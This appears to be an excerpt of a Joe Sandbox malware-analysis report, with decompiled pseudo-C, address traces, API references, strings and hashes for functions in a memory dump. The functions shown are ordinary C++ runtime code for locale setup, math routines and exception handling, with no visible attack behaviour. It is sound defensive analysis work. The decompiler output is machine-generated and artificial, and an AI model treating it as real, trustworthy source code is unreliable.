0x00408c9e
0x00408c8e
0x00408c57
0x00408bcf
0x00408bb8
0x00408a95
0x00408a95
0x00408a98
0x00408a9b
0x00408a9e
0x00408ae9
0x00408ae9
0x00408af0
0x00408af3
0x00408af6
0x00408af7
0x00408b48
0x00408b49
0x00408b4a
0x00408b4f
0x00408b5a
0x00408b5d
0x00408b62
0x00408b6a
0x00408af9
0x00408af9
0x00408afb
0x00408afc
0x00408afd
0x00408b02
0x00408b05
0x00408b0e
0x00408b0f
0x00408b12
0x00408b17
0x00408b1d
0x00408b31
0x00408b31
0x00408b33
0x00408b3b
0x00408b45
0x00408b1f
0x00408b1f
0x00408b22
0x00408b25
0x00408b27
0x00408b2a
0x00408b2d
0x00000000
0x00408b2f
0x00408b2f
0x00000000
0x00408b2f
0x00408b2d
0x00408b1d
0x00408af7
0x00408a8f
0x00408a78
0x00408a03
0x00408a03
0x00000000
0x00408a03
0x00408a01
0x004089f1
0x00000000
0x00408a0f
0x00408a0f
0x00408a16
0x00408a1d
0x00408a20
0x00408a23
0x00408a23
0x00000000
0x004089e0
0x00408980
0x00408980
0x00408983
0x00408987
0x0040898b
0x00408990
0x00408997
0x0040899a
0x00000000
0x0040899a
0x00408968
0x00408968
0x00000000
0x00408968
0x00408957
0x0040895d
0x00000000
0x0040895d
0x00408955
0x0040894b
0x0040893e
0x004087af
0x004087b4
0x004087b9
0x004087c0
0x004087c9
0x004087ce
0x004087d3
0x004087d6
0x004087d9
0x004087db
0x004087de
0x004087e3
0x004087e3
0x004087e6
0x004087e9
0x004087f0
0x004087f2
0x004087f5
0x004087fa
0x004087fa
0x004087fd
0x00408800
0x00408807
0x00408809
0x0040880c
0x00408811
0x00408811
0x00408814
0x00408817
0x0040881e
0x00408820
0x00408823
0x00408828
0x00408828
0x0040882b
0x0040882e
0x00408835
0x00408837
0x0040883a
0x0040883f
0x0040883f
0x00408842
0x00408845
0x0040884c
0x0040884e
0x00408851
0x00408856
0x00408856
0x0040885c
0x00408863
0x00408868
0x0040886c
0x00408870
0x0040887c
0x0040887f
0x00000000
0x0040887f
0x00408735
0x00408735
0x00000000
0x00408735
0x00408724
0x00408727
0x00000000
0x00408727
0x00408722
0x004086ec
0x004086ec
0x004086ef
0x004086f9
0x00408701
0x00408702
0x00408703
0x00408707
0x00408711
0x00408711
0x004086ea
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00408686
std::_Lockit::_Lockit.LIBCPMT ref: 004086A8
std::_Lockit::~_Lockit.LIBCPMT ref: 004086C8
std::_Lockit::~_Lockit.LIBCPMT ref: 004086EF
std::_Lockit::_Lockit.LIBCPMT ref: 00408768
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004087B4
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004087CE
std::_Lockit::~_Lockit.LIBCPMT ref: 00408863
std::_Facet_Register.LIBCPMT ref: 00408870

Part of subcall function 00412430: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041243C

Strings

tC, xrefs: 0040866F
bad locale name, xrefs: 0040888A
Pr@, xrefs: 004087C0

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
String ID: Pr@$bad locale name$tC
API String ID: 1592514138-2114825477
Opcode ID: 6665d8db48f19ea5e22cfe4d70d708fe82623e984989587617606452e5b48852
Instruction ID: ce6ce3d53a677cd5d734712daaf5797b23b25a8e7ecebb72da1bad7b0cdab8cd
Opcode Fuzzy Hash: 6665d8db48f19ea5e22cfe4d70d708fe82623e984989587617606452e5b48852
Instruction Fuzzy Hash: B961ADB5D00208DFDB10DFA5DA45BDEBBB4AF14314F14442EE845B7381EB78A948CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408E80 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00408E80(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				short _v36;
				char _v40;
				short _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				char _v128;
				char _v172;
				signed int _t60;
				intOrPtr* _t63;
				intOrPtr _t66;
				void* _t72;
				char* _t82;
				intOrPtr _t84;
				short _t85;
				char _t87;
				char _t88;
				intOrPtr* _t108;
				intOrPtr* _t109;
				void* _t111;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr* _t118;
				signed int _t122;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;

				_t105 = __ebx;
				_push(0xffffffff);
				_push(0x431cf5);
				_push( *[fs:0x0]);
				_t123 = _t122 - 0x9c;
				_push(__esi);
				_push(__edi);
				_t60 =  *0x443048; // 0x35200185
				_push(_t60 ^ _t122);
				 *[fs:0x0] =  &_v16;
				_t63 = _a4;
				_t113 = _a8;
				_v76 = _t63;
				_v72 = 0;
				if(_t63 == 0) {
					L23:
					 *[fs:0x0] = _v16;
					return 4;
				} else {
					_t132 =  *_t63;
					if( *_t63 != 0) {
						goto L23;
					} else {
						_t118 = E0041362C(__ebx, _t113, __esi, _t132, 0x18);
						_t125 = _t123 + 4;
						_v80 = _t118;
						_v8 = 0;
						asm("xorps xmm0, xmm0");
						asm("movups [esi], xmm0");
						asm("movq [esi+0x10], xmm0");
						_t8 = _t113 + 4; // 0x0
						_t66 =  *_t8;
						if(_t66 == 0) {
							_t115 = 0x43e90c;
						} else {
							_t115 =  *((intOrPtr*)(_t66 + 0x18));
							if(_t115 == 0) {
								_t10 = _t66 + 0x1c; // 0x1c
								_t115 = _t10;
							}
						}
						_t108 =  &_v68;
						E0041247D(_t108, 0);
						_v64 = 0;
						_v60 = 0;
						_v56 = 0;
						_v52 = 0;
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						_v8 = 7;
						_t135 = _t115;
						if(_t115 == 0) {
							E00412430("bad locale name");
							goto L25;
						} else {
							E00412760(_t108,  &_v68, _t115);
							_v72 = 1;
							 *((intOrPtr*)(_t118 + 4)) = 0;
							_v8 = 9;
							 *_t118 = 0x434448;
							E0041A69B(_t111, _t118);
							E00412BB1(_t135,  &_v128);
							 *((intOrPtr*)(_t118 + 8)) = 0;
							 *((intOrPtr*)(_t118 + 0x10)) = 0;
							 *((intOrPtr*)(_t118 + 0x14)) = 0;
							_v84 = _t118;
							_v8 = 0xa;
							E00412BB1(_t135,  &_v172);
							_push(1);
							_push(1);
							_t82 = E0041823E();
							_t126 = _t125 + 0x18;
							if(_t82 == 0) {
								L25:
								E004123B3(_t105, __eflags);
								goto L26;
							} else {
								_push(1);
								_push(6);
								 *_t82 = 0;
								 *((intOrPtr*)(_t118 + 8)) = _t82;
								_t108 = E0041823E();
								_t127 = _t126 + 8;
								if(_t108 == 0) {
									L26:
									E004123B3(_t105, __eflags);
									goto L27;
								} else {
									_t84 =  *((intOrPtr*)("false")); // 0x736c6166
									 *_t108 = _t84;
									_t85 =  *0x43e944; // 0x65
									_push(1);
									_push(5);
									 *((short*)(_t108 + 4)) = _t85;
									 *((intOrPtr*)(_t118 + 0x10)) = _t108;
									_t108 = E0041823E();
									_t128 = _t127 + 8;
									if(_t108 == 0) {
										L27:
										_t72 = E004123B3(_t105, __eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t109 =  *_t108;
										__eflags = _t109;
										if(_t109 != 0) {
											return  *((intOrPtr*)( *_t109))(1);
										}
										return _t72;
									} else {
										_t87 = "true"; // 0x65757274
										 *_t108 = _t87;
										_t88 =  *0x43e94c; // 0x0
										 *((char*)(_t108 + 4)) = _t88;
										 *((intOrPtr*)(_t118 + 0x14)) = _t108;
										 *((short*)(_t118 + 0xc)) = 0x2c2e;
										 *_v76 = _t118;
										_v8 = 0xc;
										E004127AB(_t108,  &_v68);
										_t92 = _v24;
										_t129 = _t128 + 4;
										if(_v24 != 0) {
											E0041AC1E(_t92);
											_t129 = _t129 + 4;
										}
										_t93 = _v32;
										_v24 = 0;
										if(_v32 != 0) {
											E0041AC1E(_t93);
											_t129 = _t129 + 4;
										}
										_t94 = _v40;
										_v32 = 0;
										if(_v40 != 0) {
											E0041AC1E(_t94);
											_t129 = _t129 + 4;
										}
										_t95 = _v48;
										_v40 = 0;
										if(_v48 != 0) {
											E0041AC1E(_t95);
											_t129 = _t129 + 4;
										}
										_t96 = _v56;
										_v48 = 0;
										if(_v56 != 0) {
											E0041AC1E(_t96);
											_t129 = _t129 + 4;
										}
										_t97 = _v64;
										_v56 = 0;
										if(_v64 != 0) {
											E0041AC1E(_t97);
										}
										_v64 = 0;
										E004124D5( &_v68);
										goto L23;
									}
								}
							}
						}
					}
				}
			}

0x00408e80
0x00408e83
0x00408e85
0x00408e90
0x00408e91
0x00408e97
0x00408e98
0x00408e99
0x00408ea0
0x00408ea4
0x00408eaa
0x00408ead
0x00408eb0
0x00408eb3
0x00408ebc
0x004090c7
0x004090cf
0x004090dc
0x00408ec2
0x00408ec2
0x00408ec5
0x00000000
0x00408ecb
0x00408ed2
0x00408ed4
0x00408ed7
0x00408eda
0x00408ee1
0x00408ee4
0x00408ee7
0x00408eec
0x00408eec
0x00408ef1
0x00408eff
0x00408ef3
0x00408ef3
0x00408ef8
0x00408efa
0x00408efa
0x00408efa
0x00408ef8
0x00408f06
0x00408f09
0x00408f0e
0x00408f15
0x00408f19
0x00408f20
0x00408f26
0x00408f2d
0x00408f31
0x00408f34
0x00408f38
0x00408f3b
0x00408f3e
0x00408f41
0x00408f44
0x00408f48
0x00408f4a
0x004090e2
0x00000000
0x00408f50
0x00408f55
0x00408f5a
0x00408f61
0x00408f68
0x00408f6f
0x00408f75
0x00408f7e
0x00408f83
0x00408f8a
0x00408f91
0x00408f98
0x00408fa1
0x00408fa6
0x00408fab
0x00408fad
0x00408faf
0x00408fb4
0x00408fb9
0x004090e7
0x004090e7
0x00000000
0x00408fbf
0x00408fbf
0x00408fc1
0x00408fc3
0x00408fc6
0x00408fce
0x00408fd0
0x00408fd5
0x004090ec
0x004090ec
0x00000000
0x00408fdb
0x00408fdb
0x00408fe0
0x00408fe2
0x00408fe8
0x00408fea
0x00408fec
0x00408ff0
0x00408ff8
0x00408ffa
0x00408fff
0x004090f1
0x004090f1
0x004090f6
0x004090f7
0x004090f8
0x004090f9
0x004090fa
0x004090fb
0x004090fc
0x004090fd
0x004090fe
0x004090ff
0x00409100
0x00409102
0x00409104
0x00000000
0x0040910a
0x0040910c
0x00409005
0x00409005
0x0040900a
0x0040900c
0x00409011
0x00409014
0x00409017
0x00409020
0x00409025
0x0040902d
0x00409032
0x00409035
0x0040903a
0x0040903d
0x00409042
0x00409042
0x00409045
0x00409048
0x00409051
0x00409054
0x00409059
0x00409059
0x0040905c
0x0040905f
0x00409068
0x0040906b
0x00409070
0x00409070
0x00409073
0x00409076
0x0040907f
0x00409082
0x00409087
0x00409087
0x0040908a
0x0040908d
0x00409096
0x00409099
0x0040909e
0x0040909e
0x004090a1
0x004090a4
0x004090ad
0x004090b0
0x004090b5
0x004090bb
0x004090c2
0x00000000
0x004090c2
0x00408fff
0x00408fd5
0x00408fb9
0x00408f4a
0x00408ec5

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00408F09
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00408F55
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040902D
std::_Lockit::~_Lockit.LIBCPMT ref: 004090C2
Concurrency::cancel_current_task.LIBCPMT ref: 004090E7
Concurrency::cancel_current_task.LIBCPMT ref: 004090EC
Concurrency::cancel_current_task.LIBCPMT ref: 004090F1

Strings

true, xrefs: 00409005
false, xrefs: 00408FDB
bad locale name, xrefs: 004090DD

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: std::_$Concurrency::cancel_current_task$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name$false$true
API String ID: 3559308103-1062449267
Opcode ID: 478219141b80ce84f0c68b9b521677dd0593b564faaa7bf4f2cfddecf412524e
Instruction ID: 972b579e4d9e21fa5c226694c29b24cba1ae6b4f551020a53e3f72307f06c12f
Opcode Fuzzy Hash: 478219141b80ce84f0c68b9b521677dd0593b564faaa7bf4f2cfddecf412524e
Instruction Fuzzy Hash: 56716EB0D01344DBEB20DFA5C9457DEBBB4AF14304F14406EE855E7382EBB99A44CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042F09D Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00430BBF), ref: 0042F0B6

Strings

asin, xrefs: 0042F1E3
pow, xrefs: 0042F154, 0042F1FE, 0042F24B
acos, xrefs: 0042F1EC
0'@, xrefs: 0042F180, 0042F22A, 0042F270
exp, xrefs: 0042F135, 0042F19A
log, xrefs: 0042F113, 0042F122
sqrt, xrefs: 0042F1F5
log10, xrefs: 0042F0F8, 0042F107

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: DecodePointer
String ID: 0'@$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-2229507274
Opcode ID: db2c04113a97bc1cb04e4bd5854b1a10a94eac1545050b31a86fc317bb892a2a
Instruction ID: 243476001b44ac5449d8f3229298061633b823db50f8ef1809aa2f86a7d9650d
Opcode Fuzzy Hash: db2c04113a97bc1cb04e4bd5854b1a10a94eac1545050b31a86fc317bb892a2a
Instruction Fuzzy Hash: 79519D75A0412ADBDF148F98F8481BE7BB4FF4A300FD141B6D490A6354CB798929CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00416D6A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00416D6A(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E00417CE0(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E0041D1C9(_t270, _t275, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_t202 = E004169EE(_t271, _t275, _t296, _t301, _t315, _t301, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E004169EE(_t271, _t275, _t296, 0, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00414348(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E0041427B(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00416CEA(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E0041D1C9(_t271, _t275, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t209 = _t272 + 8;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E004169EE(_t270, _t275, _t296, _t301, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E004169EE(_t270, _t275, _t296, _t301, 0) + 0x10);
								_t259 = E004169EE(_t270, _t275, _t296, _t301, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E004169EE(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E0041427B(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E00416CEA(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E004146B3(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E004169EE(_t270, _t275, _t296, _t301, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E00417788(_t270, _t301, _t315, _t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E004169EE(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
																	_t237 = E004169EE(_t270, _t275, _t296, _t301, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E004169EE(_t270, _t275, _t296, _t301, _t315) + 0x1c));
										_t264 = E004169EE(_t270, _t275, _t296, _t301, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E00417788(_t270, _t301, _t315, _t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E004200AB(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(E00417411( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x443ba4) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E004146B3(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E004173F9( &_v64);
											E00414B7B( &_v64, 0x441b8c);
											L64:
											 *(E004169EE(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
											_t231 = E004169EE(_t270, _t275, _t296, _t301, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E0041446E(_t275, _t315, _t270);
											E00417688(_a8, _a16, _t301);
											_t234 = E00417845(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E004175FF(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x00416d6a
0x00416d71
0x00416d73
0x00416d7c
0x00416d82
0x00416d8a
0x00416d8c
